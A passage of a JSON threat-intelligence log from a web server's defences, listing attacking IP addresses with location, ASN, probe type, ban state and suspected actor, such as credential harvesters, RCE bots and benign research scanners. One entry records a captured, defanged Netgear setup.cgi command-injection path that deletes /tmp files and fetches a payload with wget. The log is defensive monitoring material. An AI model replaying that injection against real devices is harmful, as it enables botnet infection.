   "last_seen": "2026-10-07T03:58:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "111.90.180.172",
   "country": "Cambodia",
   "cc": "KH",
   "city": "Phnom Penh",
   "lat": 11.5556,
   "lon": 104.933,
   "asn": 38235,
   "org": "Angkor Data Communication",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T03:50:00+02:00",
   "last_seen": "2026-10-07T03:50:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "118.145.104.105",
   "country": "China",
   "cc": "CN",
   "city": "Haidian (Haidian Qu)",
   "lat": 39.9794,
   "lon": 116.338,
   "asn": 137718,
   "org": "Beijing Volcano Engine Technology Co., Ltd.",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T19:35:00+02:00",
   "last_seen": "2026-10-06T19:35:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "124.158.13.141",
   "country": "Vietnam",
   "cc": "VN",
   "city": "Hanoi",
   "lat": 21.0278,
   "lon": 105.834,
   "asn": 38733,
   "org": "CMC Telecom Infrastructure Company",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T01:40:00+02:00",
   "last_seen": "2026-10-07T01:40:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "136.109.107.235",
   "country": "United States",
   "cc": "US",
   "city": "The Dalles",
   "lat": 45.6018,
   "lon": -121.185,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "235.107.109.136.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T18:47:00+02:00",
   "last_seen": "2026-10-06T18:47:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "138.122.21.19",
   "country": "Brazil",
   "cc": "BR",
   "city": "Dias d'\u00c1vila",
   "lat": -12.6125,
   "lon": -38.2969,
   "asn": 264308,
   "org": "RM INFORMATICA LTDA",
   "ptr": "138-122-21-19.rminet.com.br",
   "types": [
    "attack-tool"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T22:07:00+02:00",
   "last_seen": "2026-10-06T22:07:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "142.93.0.66",
   "country": "United States",
   "cc": "US",
   "city": "North Bergen",
   "lat": 40.8054,
   "lon": -74.0241,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "b1cb777a43.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T18:12:00+02:00",
   "last_seen": "2026-10-06T18:12:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [
    "/.env"
   ],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS b1cb777a43.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "143.244.57.90",
   "country": "France",
   "cc": "FR",
   "city": "Paris",
   "lat": 48.8575,
   "lon": 2.35138,
   "asn": 60068,
   "org": "Datacamp Limited",
   "ptr": "unn-143-244-57-90.datapacket.com",
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T18:39:00+02:00",
   "last_seen": "2026-10-06T18:39:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "158.23.176.177",
   "country": "Mexico",
   "cc": "MX",
   "city": "Quer\u00e9taro City",
   "lat": 20.5888,
   "lon": -100.39,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T19:22:00+02:00",
   "last_seen": "2026-10-06T19:22:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "158.255.83.176",
   "country": "Russia",
   "cc": "RU",
   "city": "Moscow",
   "lat": 55.7734,
   "lon": 37.5491,
   "asn": 60904,
   "org": "ATC Telecom LTD.",
   "ptr": null,
   "types": [
    "command-injection"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T22:40:00+02:00",
   "last_seen": "2026-10-06T22:40:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [
    "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//158.255.83.176:\u2026"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "165.22.59.27",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore (Pioneer)",
   "lat": 1.32123,
   "lon": 103.695,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": null,
   "types": [
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T04:05:00+02:00",
   "last_seen": "2026-10-07T04:05:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "172.68.151.42",
   "country": "France",
   "cc": "FR",
   "city": "Paris",
   "lat": 48.8575,
   "lon": 2.35138,
   "asn": 13335,
   "org": "Cloudflare, Inc.",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T02:23:00+02:00",
   "last_seen": "2026-10-07T02:23:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "cdn-edge"
   ],
   "paths": [],
   "actor": {
    "label": "CDN edge relaying an attack (true origin hidden)",
    "confidence": "high",
    "evidence": [
     "AS13335 Cloudflare is a CDN; the real client is behind it"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "172.69.223.156",
   "country": "France",
   "cc": "FR",
   "city": "Paris",
   "lat": 48.8575,
   "lon": 2.35138,
   "asn": 13335,
   "org": "Cloudflare, Inc.",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T02:48:00+02:00",
   "last_seen": "2026-10-07T02:48:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "cdn-edge"
   ],
   "paths": [],
   "actor": {
    "label": "CDN edge relaying an attack (true origin hidden)",
    "confidence": "high",
    "evidence": [
     "AS13335 Cloudflare is a CDN; the real client is behind it"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "172.71.119.90",
   "country": "France",
   "cc": "FR",
   "city": "Paris",
   "lat": 48.8575,
   "lon": 2.35138,
   "asn": 13335,
   "org": "Cloudflare, Inc.",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T03:14:00+02:00",
   "last_seen": "2026-10-07T03:14:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "cdn-edge"
   ],
   "paths": [],
   "actor": {
    "label": "CDN edge relaying an attack (true origin hidden)",
    "confidence": "high",
    "evidence": [
     "AS13335 Cloudflare is a CDN; the real client is behind it"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "184.105.247.194",
   "country": "United States",
   "cc": "US",
   "city": "Fremont (East Industrial)",
   "lat": 37.49,
   "lon": -121.931,
   "asn": 6939,
   "org": "Hurricane Electric LLC",
   "ptr": "scan-13.shadowserver.io",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T02:47:00+02:00",
   "last_seen": "2026-10-07T02:47:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS scan-13.shadowserver.io"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "187.108.1.142",
   "country": "Brazil",
   "cc": "BR",
   "city": "Joinville",
   "lat": -26.3044,
   "lon": -48.8464,
   "asn": 28267,
   "org": "SIM INTERNET PROVEDORES DE INTERNET EIRELI.",
   "ptr": "as28267.sc.simfibra.com.br",
   "types": [
    "attack-tool"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T02:29:00+02:00",
   "last_seen": "2026-10-07T02:29:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "187.87.144.234",
   "country": "Brazil",
   "cc": "BR",
   "city": "Mogi das Cruzes",
   "lat": -23.5394,
   "lon": -46.2167,
   "asn": 262686,
   "org": "Netwalk Telecomunica\u00e7\u00f5es em Inf. Ltda",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T01:44:00+02:00",
   "last_seen": "2026-10-07T01:44:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "190.111.110.13",
   "country": "Brazil",
   "cc": "BR",
   "city": "Cubat\u00e3o",
   "lat": -23.895,
   "lon": -46.4253,
   "asn": 270417,
   "org": "UP Down Telecom Ltda",
   "ptr": "13-110-111-190.updowntelecom.com.br",
   "types": [
    "attack-tool"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T22:14:00+02:00",
   "last_seen": "2026-10-06T22:14:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "199.165.159.33",
   "country": "United States",
   "cc": "US",
   "city": "Pleasanton",
   "lat": 37.6951,
   "lon": -121.9,
   "asn": 22168,
   "org": "The Shadowserver Foundation, Inc.",
   "ptr": "scan-94-0.shadowserver.io",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T02:41:00+02:00",
   "last_seen": "2026-10-07T02:41:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "ASN organisation matches 'shadowserver'"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "199.165.159.65",
   "country": "United States",
   "cc": "US",
   "city": "Pleasanton",
   "lat": 37.6951,
   "lon": -121.9,
   "asn": 22168,
   "org": "The Shadowserver Foundation, Inc.",
   "ptr": "scan-98-0.shadowserver.io",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T02:42:00+02:00",
   "last_seen": "2026-10-07T02:42:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "ASN organisation matches 'shadowserver'"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "2.28.13.214",
   "country": "Germany",
   "cc": "DE",
   "city": "Falkenstein",
   "lat": 50.4754,
   "lon": 12.3683,
   "asn": 24940,
   "org": "Hetzner Online GmbH",
   "ptr": "static.214.13.28.2.clients.your-server.de",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T05:33:00+02:00",
   "last_seen": "2026-10-07T05:33:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "20.214.145.90",
   "country": "South Korea",
   "cc": "KR",
   "city": "Yongsan-dong",
   "lat": 37.5503,
   "lon": 126.997,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T23:18:00+02:00",
   "last_seen": "2026-10-06T23:18:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "200.219.11.15",
   "country": "Brazil",
   "cc": "BR",
   "city": "Cachoeirinha",
   "lat": -29.9457,
   "lon": -51.099,
   "asn": 270805,
   "org": "IPVDATA TECNOLOGIA E COMPUTACAO EM NUVEM LTDA",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T05:25:00+02:00",
   "last_seen": "2026-10-07T05:25:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "209.38.248.17",
   "country": "Germany",
   "cc": "DE",
   "city": "Ediger-Eller",
   "lat": 50.1167,
   "lon": 7.15,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "c1fe727412.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T18:12:00+02:00",
   "last_seen": "2026-10-06T18:12:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "research-scanner",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS c1fe727412.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "216.126.237.47",
   "country": "United States",
   "cc": "US",
   "city": "Ogden",
   "lat": 41.223,
   "lon": -111.974,
   "asn": 14956,
   "org": "RouterHosting LLC",
   "ptr": "47.237.126.216.static.cloudzy.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T04:57:00+02:00",
   "last_seen": "2026-10-07T04:57:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "216.218.206.68",
   "country": "United States",
   "cc": "US",
   "city": "San Ramon",
   "lat": 37.7745,
   "lon": -121.961,
   "asn": 6939,
   "org": "Hurricane Electric LLC",
   "ptr": "scan-07.shadowserver.io",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T05:15:00+02:00",
   "last_seen": "2026-10-07T05:15:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS scan-07.shadowserver.io"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "216.81.248.89",
   "country": "United States",
   "cc": "US",
   "city": "Las Vegas",
   "lat": 36.1716,
   "lon": -115.139,
   "asn": 11320,
   "org": "LightEdge Solutions",
   "ptr": "ip89.kcy.lh-nap.net",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T23:51:00+02:00",
   "last_seen": "2026-10-06T23:51:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "221.159.119.6",
   "country": "South Korea",
   "cc": "KR",
   "city": "Seongnam-si (Jeongja-dong)",
   "lat": 37.3644,
   "lon": 127.116,
   "asn": 4766,
   "org": "Korea Telecom",
   "ptr": null,
   "types": [
    "command-injection"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T03:50:00+02:00",
   "last_seen": "2026-10-07T03:50:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "34.133.94.182",
   "country": "United States",
   "cc": "US",
   "city": "Council Bluffs",
   "lat": 41.2619,
   "lon": -95.8608,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "182.94.133.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T22:26:00+02:00",
   "last_seen": "2026-10-06T22:26:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "34.53.119.204",
   "country": "United States",
   "cc": "US",
   "city": "The Dalles",
   "lat": 45.6018,
   "lon": -121.185,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "204.119.53.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T21:15:00+02:00",
   "last_seen": "2026-10-06T21:15:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "34.73.22.186",
   "country": "United States",
   "cc": "US",
   "city": "North Charleston",
   "lat": 32.8769,
   "lon": -80.0114,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "186.22.73.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T18:59:00+02:00",
   "last_seen": "2026-10-06T18:59:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "35.201.196.175",
   "country": "Taiwan",
   "cc": "TW",
   "city": "Taoyuan",
   "lat": 25.0797,
   "lon": 121.234,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "175.196.201.35.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T20:31:00+02:00",
   "last_seen": "2026-10-06T20:31:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "41.38.160.135",
   "country": "Egypt",
   "cc": "EG",
   "city": "Al Khu\u015f\u016b\u015f",
   "lat": 30.1529,
   "lon": 31.315,
   "asn": 8452,
   "org": "TE-AS",
   "ptr": null,
   "types": [
    "command-injection"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T23:52:00+02:00",
   "last_seen": "2026-10-06T23:52:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "45.138.12.6",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T05:57:00+02:00",
   "last_seen": "2026-10-07T05:57:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "abuse-prone-hosting",
    "cluster:45.138.12.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "4 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "45.148.10.120",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T04:59:00+02:00",
   "last_seen": "2026-10-07T04:59:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:45.148.10.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "4 addresses from 45.148.10.0/24 (AS48090) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "45.148.10.14",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T21:02:00+02:00",
   "last_seen": "2026-10-06T21:02:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "cluster:45.148.10.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "4 addresses from 45.148.10.0/24 (AS48090) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "45.148.10.171",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T05:18:00+02:00",
   "last_seen": "2026-10-07T05:18:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:45.148.10.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "4 addresses from 45.148.10.0/24 (AS48090) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "45.148.10.74",
   "country": "Andorra",
   "cc": "AD",
